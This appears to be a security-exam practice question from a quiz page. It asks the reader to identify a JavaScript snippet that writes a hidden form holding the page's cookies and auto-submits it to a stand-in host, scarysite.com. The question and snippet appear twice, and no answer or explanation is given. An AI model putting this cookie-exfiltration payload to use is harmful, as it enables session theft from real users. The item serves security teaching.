What has Gerald stumbled upon?

Gerald is a web security consultant for Protectors International. Gerald’s main responsibility is to
search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was
tipped off about a particular site and is now looking over its source code in a protected

environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled
upon?
<script>
document.write(‘<form name=hack method=post action=”http://
scarysite.com/getit.php”>
<input type=hidden name=sid value=”‘ + escape(document.cookie) +
‘”>’);
document.hack.submit();
</script>

Gerald is a web security consultant for Protectors International. Gerald’s main responsibility is to
search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was
tipped off about a particular site and is now looking over its source code in a protected

environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled
upon?
<script>
document.write(‘<form name=hack method=post action=”http://
scarysite.com/getit.php”>
<input type=hidden name=sid value=”‘ + escape(document.cookie) +
‘”>’);
document.hack.submit();
</script>

A.
Hidden post command

B.
Hidden form fields

C.
JavaScript hijacking

D.
XSS attack

Explanation:

Show Hint

Leave a Reply 0

Your email address will not be published. Required fields are marked *